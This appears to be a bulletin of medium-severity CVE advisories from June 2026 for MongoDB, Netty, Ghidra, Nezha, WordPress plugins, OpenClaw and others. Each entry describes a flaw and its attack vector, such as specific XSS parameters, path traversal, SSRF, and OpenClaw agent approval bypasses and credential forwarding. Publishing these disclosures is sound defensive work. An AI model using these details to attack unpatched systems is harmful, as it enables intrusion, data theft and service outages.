| moby--moby | Moby is an open source container framework. In Docker Engine prior to version 29.5.1, Docker Daemon versions 28.5.2 and prior, and Moby Daemon prior to version 2.0.0-beta.14, a race condition during docker cp mount setup allows a malicious container to create empty files or directories at arbitrary absolute paths on the host filesystem. This issue has been patched in Docker Engine version 29.5.1 and Moby Daemon version 2.0.0-beta.14. | 2026-06-12 | 6.1 | CVE-2026-41568 |
| Mohammed-eid35--bank-management-system-springboot | A security vulnerability has been detected in Mohammed-eid35 bank-management-system-springboot up to 7b9bcc65ad7df3db29af71aed9bb500e5f24d948. This affects an unknown part of the file src/main/java/com/alien/bank/management/system/controller/TransactionController.java of the component Transaction Endpoint. Such manipulation leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11521 |
| MongoDB--MongoDB | An authenticated user with the read role may read limited amounts of uninitialized stack memory via specially-crafted issuances of the filemd5 command | 2026-06-09 | 6.5 | CVE-2026-9754 |
| MongoDB--MongoDB Server | A bug in query analysis processing of the $vectorSearch aggregation stage for Queryable Encryption (QE) or Client-Side Field Level Encryption (CSFLE) results in literal values for encrypted fields within the $vectorSearch stage filter expressions to be sent to the server as plaintext instead of ciphertext. | 2026-06-09 | 6.5 | CVE-2026-9741 |
| MongoDB--MongoDB Server | When using $changestreams and $_requestReshardingResumeToken with the exchange option the server hits an invariant which causes the server to crash. There are no special privileges needed. The user must be logged in to issue the statement. | 2026-06-09 | 6.5 | CVE-2026-9746 |
| MongoDB--MongoDB Server | Adding fromRouter:true and runtimeConstants.userRoles could cause aggregations to crash mongodb server. | 2026-06-09 | 6.5 | CVE-2026-9747 |
| MongoDB--MongoDB Server | The $_internalConvertBucketIndexStats stage used PauseExecution as a way to signal "skip this document" when an index stats conversion failed. But PauseExecution is not a general purpose skip mechanism, but rather a TeeBuffer-internal signal used solely by $facet to coordinate its sub-pipelines. When this stage is placed before $facet in a pipeline, TeeBuffer receives the unexpected PauseExecution from upstream and hits a hard invariant assertion, crashing mongod. | 2026-06-09 | 6.5 | CVE-2026-9748 |
| MongoDB--MongoDB Server | This issue can occur when running an aggregation pipeline that uses the internal $exchange stage configured with key-range partitioning and order-preserving delivery. If a single key range produces enough documents to fill its exchange buffer (that is, many results are routed to the same consumer), the server reaches the code path where a full per-consumer buffer is detected but the internal "high watermark" for that key range is not updated as intended. | 2026-06-09 | 6.5 | CVE-2026-9749 |
| MongoDB--MongoDB Server | An authenticated user can cause a MongoDB server to crash or return incorrect results by creating documents that interfere with internal metadata processing during query execution. This stems from insufficient separation between user-controlled document fields and internal metadata in certain execution paths. | 2026-06-09 | 6.5 | CVE-2026-9750 |
| MongoDB--MongoDB Server | An authorized user could trigger a server crash by running a query with a 2dsphere index on a field that stores a GeoJSON GeometryCollection containing a Polygon with a strict-winding CRS. Strict-winding polygons are intentionally unsupported for indexing, but the guard that rejects them does not inspect members of a GeometryCollection, allowing the unsafe path to be reached which ends with an ensuing null-pointer dereference. | 2026-06-09 | 6.5 | CVE-2026-9752 |
| MongoDB--MongoDB Server | MongoDB server may log authentication parameters, including credentials, to the server log during SASL authentication. When connection health metric logging is enabled, the full authentication parameters are written to the log without redaction. | 2026-06-09 | 5.5 | CVE-2026-9735 |
| MongoDB--MongoDB Server | The ldapQueryPassword parameter, when set through the runtime setParameter command, will log the new password to the mongod.log file in plain text. | 2026-06-09 | 5.5 | CVE-2026-9751 |
| MongoDB--MongoDB server | In MongoDB Server 8.0, an aggregation stage can leave its _subPipeline field null during processing of certain pipelines. If a getMore is subsequently issued on the same cursor, the server may dereference this null sub-pipeline when reattaching to the operation context, accessing an invalid address and crashing the process. This issue allows an authenticated user who can run aggregation pipelines to cause a denial of service by issuing a specially crafted aggregation followed by getMore on affected versions. | 2026-06-09 | 6.5 | CVE-2026-9743 |
| Moovit--Bus & Public Transit App | A flaw has been found in Moovit Bus & Public Transit App 1.18 on Android. This affects an unknown part of the component com.tranzmate. Executing a manipulation can lead to improper authorization in handler for custom url scheme. The attack can only be executed locally. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 5.3 | CVE-2026-12189 |
| mra13--Accept Stripe Payments | WordPress Plugin Stripe Payments 2.0.39 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the AcceptStripePayments-settings[currency_code] parameter. Attackers can submit POST requests to /wp-admin/options.php with script payloads in the currency_code field to execute arbitrary JavaScript in administrator browsers when settings are viewed. | 2026-06-08 | 6.4 | CVE-2021-47983 |
| myasui--WP Vault | WP Vault 0.8.6.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting an unescaped parameter in the include functionality. Attackers can supply directory traversal sequences through the wpv-image GET parameter to access sensitive files like system configuration and credentials. | 2026-06-09 | 6.2 | CVE-2016-20064 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a heap-use-after-free vulnerability in SleighBuilder::generatePointerAdd caused by iterator invalidation when PcodeCacher::allocateInstruction reallocates the issued vector. Attackers can trigger memory corruption by decompiling malicious binaries through the public Sleigh::oneInstruction C++ API, affecting downstream SLEIGH library consumers. | 2026-06-10 | 6.1 | CVE-2026-49496 |
| nationalsecurityagency--ghidra | Ghidra 10.2 before 12.1 contains an uncontrolled resource consumption vulnerability in ExportTrie.parseTrie() that lacks cycle detection when traversing Mach-O binary export tries. A crafted Mach-O binary with circular references in the export trie causes unbounded queue growth and exponential string concatenation, triggering OutOfMemoryError that crashes the entire JVM and loses all unsaved work. | 2026-06-10 | 5.5 | CVE-2026-49495 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.3 contains an out-of-memory vulnerability in the rust_demangle function that allocates unbounded output buffers without size limits. Attackers can craft malicious Rust symbol names in binaries to trigger exponential memory allocation, causing process crashes during binary analysis. | 2026-06-10 | 5.5 | CVE-2026-52753 |
| nationalsecurityagency--ghidra | Ghidra before 12.2 contains an unauthenticated path traversal vulnerability in the IsfServer that accepts TCP connections and passes client-supplied namespace strings directly to filesystem operations without validation. Remote attackers can connect to port 54321 and send crafted protobuf messages with traversal sequences to enumerate filesystem paths and probe arbitrary files. | 2026-06-10 | 4.8 | CVE-2026-52756 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a heap-use-after-free vulnerability in the decompiler's HighVariable::merge() function during the variable merging pass. Attackers can trigger this vulnerability by crafting a binary that causes stale pointers in the HighIntersectTest::highedgemap cache to be dereferenced, reading and writing the flags field of freed heap memory when a user opens the binary in Ghidra's decompiler view. | 2026-06-10 | 4.4 | CVE-2026-52757 |
| Naxclow--Smart Doorbell X3 | Naxclow device identifiers use fixed manufacturing prefixes combined with sequential counters, producing a fully predictable and enumerable identifier space. Because the platform also exposes an endpoint that reveals the current identifier high-water mark, the active fleet can be enumerated. | 2026-06-12 | 5.3 | CVE-2026-42932 |
| Naxclow--Smart Doorbell X3 | The Naxclow platform exposes a registration endpoint that accepts signed requests containing a batch prefix and an arbitrary caller-supplied account identifier, without validating any ownership relationship. Each call mints a new sequential device identifier and returns the current high-water counter value for the batch, allowing callers to measure and enumerate the active device space. The endpoint's behavior enables precise fleet enumeration. | 2026-06-12 | 5.3 | CVE-2026-50244 |
| Naxclow--Smart Doorbell X3 | During WiFi association, Naxclow device firmware prints the host network's SSID, PSK, and negotiated WPA keys in cleartext to an exposed UART console on production hardware. The UART pads are labeled, run with default serial settings, and drop to an interactive RT-Thread shell that permits arbitrary memory reads, enabling full firmware extraction. An attacker with brief physical access, common for outdoor-mounted devices, can therefore recover WiFi credentials and bootstrap firmware-side attacks. | 2026-06-12 | 4.6 | CVE-2026-50099 |
| Neovim--Neovim | A flaw has been found in Neovim up to 0.12.2. Affected by this issue is the function M.read of the file runtime/lua/vim/secure.lua of the component View Branch. Executing a manipulation of the argument path can lead to command injection. It is possible to launch the attack on the local host. The exploit has been published and may be used. This patch is called f83e0dcaf8cf18de94828341b0a1a61a86c75baf. A patch should be applied to remediate this issue. | 2026-06-08 | 5.3 | CVE-2026-11487 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.269 contains a profile isolation bypass vulnerability that allows authenticated users to access data belonging to other profiles by querying the session search endpoint without active-profile filtering. Attackers can send requests to the sessions search handler to retrieve session titles and transcript message content from profiles other than their own active profile. | 2026-06-09 | 6.5 | CVE-2026-49956 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.270 contains a resource exhaustion vulnerability that allows unauthenticated remote attackers to degrade service availability by repeatedly calling the passkey options endpoint without completing assertion. Attackers can send unlimited POST requests to the authentication endpoint, causing unbounded growth of the challenge store file and excessive CPU and disk I/O through repeated JSON file rewrites. | 2026-06-09 | 5.3 | CVE-2026-49955 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.303 contains a time-of-check time-of-use (TOCTOU) race condition vulnerability in the git_discard function within api/workspace_git.py that allows attackers to delete files outside the configured workspace boundary by replacing a validated path component with a symlink after validation but before deletion. Attackers can substitute a workspace-controlled path component with a symlink pointing to an external directory between the safe_resolve_ws() validation step and the subsequent Path.unlink() or shutil.rmtree() deletion call, causing the delete operation to follow the symlink and remove arbitrary files outside the workspace. | 2026-06-09 | 5 | CVE-2026-49958 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DNS resolver uses a predictable PRNG for generating DNS transaction IDs and defaults to a static UDP source port. This combination reduces the entropy of DNS queries, enabling DNS Cache Poisoning (Kaminsky attack). Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 6.8 | CVE-2026-45673 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, DefaultHttp2Connection.DefaultEndpoint initialises maxActiveStreams/maxStreams to Integer.MAX_VALUE, and Http2Settings never inserts SETTINGS_MAX_CONCURRENT_STREAMS by default (Http2Settings.java:305-307 only clamps a user-supplied value). Unless the application explicitly calls initialSettings().maxConcurrentStreams(n), a Netty HTTP/2 server advertises no limit and enforces none locally. Each open stream allocates a DefaultStream object, PropertyMap slots, flow-controller state and IntObjectHashMap entry; with ~2^30 permissible odd stream IDs a single TCP connection can create hundreds of thousands of long-lived stream objects. This is also the precondition for CVE-2023-44487-style Rapid-Reset amplification, where the absence of a low concurrent cap multiplies backend work. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-47244 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-http2 prior to versions 4.1.135.Final and 4.2.15.Final, the `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it. A remote peer could send frames that would result in the flow-controller throwing and so trigger a resource leak which at the end might take down the whole JVM due OOME. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-48043 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, before reading the first request-line, `HttpObjectDecoder` skips every byte for which `Character.isISOControl(b)` is `true` (0x00-0x1F and 0x7F) as well as all whitespace. RFC 9112 §2.2 only asks servers to ignore empty CRLF lines preceding the request-line - a carefully scoped robustness allowance intended to handle HTTP/1.0 POST workarounds. Silently absorbing NUL bytes, SOH, STX, and other non-CRLF control characters goes significantly beyond this, and can be exploited for request-boundary confusion in pipelined or multiplexed transports where a front-end component treats those bytes differently. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-50020 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, netty_unix_socket_recvFd sets msg_control to `char control[CMSG_SPACE(sizeof(int))]` (line 940) - 24 bytes on 64-bit Linux. A peer-sent SCM_RIGHTS cmsg carrying two ints has cmsg_len = CMSG_LEN(8) = 24, which fits exactly with no MSG_CTRUNC, so the kernel installs both fds in the receiving process. The subsequent check `cmsg->cmsg_len == CMSG_LEN(sizeof(int))` (line 972, expected 20) fails, the branch that would read the fd is skipped, and neither installed fd is closed. The for(;;) loop calls recvmsg again (non-blocking → EAGAIN → Java maps to 0 → read loop exits normally), leaving two leaked fds per message. There is no MSG_CTRUNC handling. Reachable via Epoll/KQueue DomainSocketChannel when the application opts into DomainSocketReadMode.FILE_DESCRIPTORS (non-default). Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 4 | CVE-2026-45536 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear as the connection ID in QUIC headers after a source-CID rotation. An on-path attacker observing the headers can use the token to perform a Denial of Service by sending a spoofed Stateless Reset packet. Version 4.2.15.Final patches the issue. | 2026-06-12 | 4.8 | CVE-2026-50009 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.9, any authenticated non-admin member can connect to the server-status WebSocket and receive telemetry for all servers, including servers owned by other users. The normal server list API filters objects by HasPermission, but the WebSocket stream treats the presence of any authenticated user as authorization for the full unfiltered server list. This issue has been patched in version 2.0.9. | 2026-06-12 | 6.5 | CVE-2026-47124 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10. | 2026-06-12 | 6.4 | CVE-2026-47268 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.14 to before version 2.1.0, authenticated users can claim the dashboard Host through NAT and preempt all dashboard routing. This issue has been patched in version 2.1.0. | 2026-06-12 | 6.5 | CVE-2026-53520 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.14 to before version 2.1.0, PATCH /server/{id} accepts and persists nonexistent ddns_profiles IDs for a member-owned server. If another user later creates a DDNS profile with one of those IDs, the DDNS worker resolves the stored ID and dispatches an update using the other user's DDNS profile configuration in the context of the attacker's server. This issue has been patched in version 2.1.0. | 2026-06-12 | 6.4 | CVE-2026-53521 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.2.0, the Nezha dashboard exposes two endpoints that create long-lived WebSocket streams to monitored agents: POST /api/v1/terminal → createTerminal() (terminal.go:27-67) and POST /api/v1/file → createFM() (fm.go:28-67). Both call rpc.NezhaHandlerSingleton.CreateStream(streamId, ...) which inserts a new ioStreamContext into an unbounded map[string]*ioStreamContext (s.ioStreams in io_stream.go:59-67). There is no per-user rate limit, no global semaphore, and no per-server connection cap. This issue has been patched in version 2.2.0. | 2026-06-12 | 6.5 | CVE-2026-53522 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.2.0, the getRedirectURL function in oauth2.go:22-29 constructs the OAuth2 callback URL by concatenating the request's Host header with a fixed path, with zero validation of the Host header. This can result in host header injection. This issue has been patched in version 2.2.0. | 2026-06-12 | 6.8 | CVE-2026-53523 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.0 to before version 2.0.14, private services (`EnableShowInService: false`) are enumerable via per-server endpoints, leaking name and timing data. This issue has been patched in version 2.0.14. | 2026-06-12 | 5.3 | CVE-2026-49397 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, when LightBlockchain::rebranch() adopts a fork chain whose tip is a macro block (checkpoint or election), it only updates self.head but fails to update self.macro_head, self.election_head, self.current_validators, or store the election header in the chain_store. This is in direct contrast with the full Blockchain::rebranch() at blockchain/src/blockchain/push.rs:504-518, which correctly updates all macro/election state when the new head is a macro block. After a rebranch to a macro block, the stale macro_head causes subsequent macro blocks pushed via push() to be verified against the wrong predecessor via verify_macro_successor(&this.macro_head). If the rebranch target was an election block, the stale current_validators causes every subsequent block to fail verify_validators(), completely stalling the light client's chain progression. This issue has been patched in version 1.4.0. | 2026-06-09 | 6.5 | CVE-2026-46540 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. network-libp2p handles kad get-record query progress in handle_dht_get (network-libp2p/src/swarm.rs). Prior to version 1.4.0, when a peer returns a FoundRecord, the code verifies the record via dht_verifier.verify(&record.record). On verifier error, handle_dht_get logs and returns early without completing the oneshot used by Network::dht_get, and without cleaning up per-query bookkeeping. Later query progress can hit the "DHT inconsistent state" path and also return without cleanup. Because Network::dht_get awaits the oneshot without a timeout, the caller future can hang indefinitely. This issue has been patched in version 1.4.0. | 2026-06-09 | 5.3 | CVE-2026-44505 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, a logic flaw in BlockInclusionProof::is_block_proven causes the function to return true without performing any cryptographic verification when get_interlink_hops yields an empty hop list. This occurs when the target block is at the election block position immediately preceding the election head's epoch. An attacker providing transaction inclusion proofs can forge a MacroBlock header for that epoch position and have it accepted as "proven" without any hash or signature verification. This issue has been patched in version 1.4.0. | 2026-06-09 | 5.9 | CVE-2026-46539 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.5.0, a remote peer can crash any full node by sending a RequestBatchSet message containing the genesis block's hash. The handler calls get_epoch_chunks which iterates backwards through macro blocks using Policy::macro_block_before. When it reaches the genesis block number, macro_block_before panics with "No macro blocks before genesis block". This issue has been patched in version 1.5.0. | 2026-06-09 | 5.3 | CVE-2026-46543 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, a denial-of-service vulnerability exists in the Ed25519 multisig delinearization code path. Ed25519PublicKey::delinearize() in keys/src/multisig/mod.rs called .unwrap() on curve point decompression, which panics when a public key is constructed from 32 bytes that do not represent a valid point on the Ed25519 curve. Ed25519PublicKey construction only validates byte length, not curve membership, so invalid keys can reach the delinearization path and crash the hosting process. This issue has been patched in version 1.4.0. | 2026-06-09 | 4.3 | CVE-2026-46542 |
| OfflineIMAP--OfflineIMAP | OfflineIMAP before 8.0.3 trusts the server with their STARTTLS capability prior to authentication, which allows STRIPTLS/man-in-the-middle attacks, taking over the connection and extracting account credentials in cleartext. | 2026-06-08 | 6.5 | CVE-2020-37248 |
| open-telemetry--opentelemetry-cpp | OpenTelemetry-cpp is the C++ implementation of OpenTelemetry. Prior to release 1.27.0, the OTLP HTTP exporters (traces/metrics/logs) read the full HTTP response into an in-memory vector of bytes without a size cap. This is exploitable for memory exhaustion when the configured collector endpoint is attacker-controlled (or a network attacker can MITM the exporter connection). This vulnerability is fixed in opentelemetry-cpp release 1.27.0. | 2026-06-12 | 5.3 | CVE-2026-44967 |
| openbullet--openbullet2 | OpenBullet2 through version 0.3.2 on Windows contains a credential disclosure vulnerability that allows remote attackers to capture the NTLMv2 hash of the process user by configuring a job proxy source with a UNC path pointing to an attacker-controlled server. When the job starts, the application attempts to load proxies from the UNC path, triggering an SMB authentication attempt that discloses the NTLMv2 hash, which can then be relayed or cracked offline. | 2026-06-08 | 6.5 | CVE-2026-39908 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an approval policy bypass vulnerability in the Skill Workshop apply flow that allows agent tool calls to set apply: true despite approvalPolicy: pending configuration. Attackers can exploit this by reaching the affected apply path to apply workshop changes before the expected approval step, potentially modifying configurations without proper authorization. | 2026-06-11 | 6.5 | CVE-2026-53808 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.19 contains an authorization bypass vulnerability in message read actions that skips channel allowlist checks. Lower-trust callers can request messages from channels not intended for them by exploiting insufficient validation in the affected feature, potentially exposing sensitive channel messages. | 2026-06-11 | 6.5 | CVE-2026-53815 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.24 contains an authorization bypass vulnerability in the MCP loopback feature that allows non-owner callers to skip owner-only tool policies and before-tool-call hooks. Attackers can invoke owner-only behavior through the affected loopback path to execute restricted tools when the feature is enabled and reachable. | 2026-06-11 | 6.6 | CVE-2026-53818 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains an exec denylist bypass vulnerability in the bundle MCP loopback session-spawn path that allows authenticated callers to bypass intended command restrictions. Attackers can reach the affected bundled MCP session-spawn path to start sessions with broader command reach than intended. | 2026-06-12 | 6.6 | CVE-2026-53820 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.24 contains a token revocation vulnerability allowing callers with revoked slash tokens to continue executing commands during monitor refresh windows. Attackers can exploit stale token acceptance to invoke slash command behavior briefly after token revocation, potentially executing unauthorized actions depending on operator configuration. | 2026-06-12 | 6.5 | CVE-2026-53824 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.7 contains an arbitrary file read vulnerability in the memory-wiki ingest feature that allows authenticated Gateway operators with operator.write scope to read local files outside intended ingest sources. Attackers with operator.write access can specify arbitrary local file paths to import file content into wiki memory, bypassing access restrictions. | 2026-06-12 | 6.5 | CVE-2026-53825 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.2 contains a credential exposure vulnerability in message.action forwarding that allows model-controlled metadata to forward action payloads with Gateway credentials to attacker-supplied loopback URLs. Remote attackers can intercept Gateway tokens and action payloads by providing malicious loopback targets through model-controlled action metadata. | 2026-06-12 | 6.5 | CVE-2026-53827 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a webhook secret revocation bypass vulnerability allowing callers with old Slack and Zalo webhook secrets to remain active after secrets.reload. Attackers can exploit the stale-secret window to deliver webhook events after operator-expected secret revocation, potentially accepting previous credentials. | 2026-06-12 | 6.5 | CVE-2026-53830 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.7 contains a hostname validation vulnerability in retry endpoint checks that allows matching hostname prefixes instead of exact hostnames. Attackers can exploit this by crafting a hostname prefix resembling a trusted host to send authentication material to untrusted endpoints. | 2026-06-12 | 6.5 | CVE-2026-53839 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.26 contains an information disclosure vulnerability in sandboxed session spawning that exposes the real workspace path to child prompts. Attackers can exploit this by spawning child sessions from sandboxed parents to reveal host workspace location or related memory context to child models. | 2026-06-12 | 4.3 | CVE-2026-53826 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains a configuration enforcement bypass vulnerability in Feishu dynamic-agent bindings that allows authenticated senders to create or update bindings without honoring configured config-write controls. Attackers can exploit this by leveraging the dynamic-agent binding feature to change sender-agent binding state beyond intended policy, potentially enabling unauthorized binding modifications. | 2026-06-12 | 4.3 | CVE-2026-53835 |
| openfga--openfga | OpenFGA is an authorization/permission engine built for developers. Prior to version 1.16.0, when iterator caching is enabled, two distinct check requests can produce the same cache key, leading to OpenFGA reusing an earlier cached result for a subsequent request. This issue has been patched in version 1.16.0. | 2026-06-10 | 5 | CVE-2026-48096 |
| OpenStack--Ironic | In OpenStack Ironic through 35.0.1, when applying a PATCH to update fields in volume properties the user is authorized for, Ironic can return unredacted sensitive information (such as iSCSI credentials). The PATCH outcome is a security issue; the POST outcome is not a security issue. | 2026-06-14 | 6.8 | CVE-2026-54421 |
| pickplugins--Accordions | The Accordions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Accordion body field in all versions up to, and including, 2.3.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-10862 |
| QEMU--Virtio-blk | A flaw was found in QEMU's virtio-blk device. The issue arises because the device does not properly validate the size of input descriptors before writing data. A malicious guest with high privileges could exploit this vulnerability by submitting a malformed virtio-blk SCSI request, leading to an out-of-bounds write in the host heap memory and a potential denial of service (DoS) for the QEMU process. | 2026-06-12 | 6.7 | CVE-2026-48914 |
| QloApps--QloApps | QloApps through 1.7.0 contains a stored cross-site scripting vulnerability in the admin file manager that allows authenticated administrators to inject malicious JavaScript by uploading crafted SVG files. Attackers can embed JavaScript event handlers such as onload within SVG files uploaded through the file manager to execute arbitrary scripts in the browser of any user who subsequently views the file. | 2026-06-08 | 4.8 | CVE-2026-25558 |
| quantumcloud--Simple Link Directory | Simple Link Directory through 9.0.4 interpolates the sld_no_results_found option into a JavaScript string literal without encoding. Because sanitize_text_field leaves quotes intact, a stored payload breaks out of the string and runs script for every page visitor. | 2026-06-10 | 5.4 | CVE-2026-53741 |
| quantumcloud--Simple Link Directory | Simple Link Directory through 9.0.4 echoes embed shortcode attributes into HTML data attributes without escaping in the embedder template. Attackers with contributor access can craft a shortcode attribute that injects an event handler executing in a viewer's browser. | 2026-06-10 | 5.4 | CVE-2026-53742 |
| rahulbhangale--WP Emoticon Rating | The WP Emoticon Rating plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 6.1 | CVE-2026-8910 |
| rahulbhangale--WP-Ultimate-Map | The WP-Ultimate-Map plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1. This is due to missing nonce validation on the process_init() function hooked to admin_init, which saves plugin settings (zoom-level, focus-lat, focus-lng, sel_places, sel_routes) via update_option() based solely on the presence of a save-setting POST parameter. Additionally, the saved values - particularly zoom-level - are stored without sanitization and later echoed into an HTML attribute (and inline JavaScript) on the settings page without escaping. This makes it possible for unauthenticated attackers to change plugin settings and inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 6.1 | CVE-2026-8907 |
| rahulbhangale--WpMobi | The WpMobi plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.0.3. This is due to missing or incorrect nonce validation on the handleSaveGeneralSettings function. This makes it possible for unauthenticated attackers to modify the plugin's General Settings and inject arbitrary web scripts into the administrator's browser via the unescaped app_name attribute reflection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The injected script executes even when the supplied app_name value fails validation and is not persisted to the database, because the form is re-rendered with the attacker-supplied in-memory value on validation failure. | 2026-06-09 | 4.3 | CVE-2026-8909 |
| Red Hat--Red Hat Ansible Automation Platform 2 | A path traversal vulnerability was found in awxkit, the CLI tool for AWX. The YAML !include directive does not sanitize file paths, allowing an attacker to craft a malicious YAML file that reads arbitrary YAML-formatted files from the local filesystem when a user imports it using "awx --conf.format yaml import". This is a client-side vulnerability requiring user interaction. | 2026-06-09 | 4.7 | CVE-2026-52902 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the admin-ui-ext component of Keycloak, which provides extended administrative user interface capabilities. The issue occurs because certain bulk role-removal endpoints fail to perform granular permission checks when deleting role mappings. This allows a delegated administrator with limited permissions to remove highly privileged roles from other users or groups, potentially disrupting administrative access control. | 2026-06-11 | 4.9 | CVE-2026-11986 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The Content Synchronization persistent search plugin allows unbounded memory growth when an authenticated client stops reading sync responses, enabling denial of service. Additional race conditions in plugin thread lifecycle can cause crashes during connection teardown or shutdown. | 2026-06-08 | 6.5 | CVE-2026-11611 |
| Red Hat--Red Hat Directory Server 11 | A heap buffer overflow flaw was found in 389 Directory Server. When serializing objectclass definitions, the oc_superior (SUP) field length is omitted from buffer size calculations in read_schema_dse() and schema_oc_to_string(), but the field is still written via strcat(). An attacker with Directory Manager privileges, or a compromised replication supplier, can trigger a server crash by creating objectclasses with long SUP values. This is an incomplete fix variant of CVE-2025-14905. | 2026-06-10 | 6.5 | CVE-2026-11884 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The ldap_utf8prev() function reads bytes before the start of a buffer without bounds checking, causing a heap buffer over-read in string filter parsing that may influence internal filter processing behavior. | 2026-06-09 | 5 | CVE-2026-11787 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The dereference control plugin does not check for allocation failure before using a BER structure, allowing an unauthenticated remote attacker to crash the LDAP server when the system is under memory pressure. | 2026-06-09 | 5.9 | CVE-2026-11788 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. A type confusion in the SSO token extended operation handler causes partial stack address information to be disclosed in LDAP responses to authenticated users. | 2026-06-09 | 4.3 | CVE-2026-11785 |
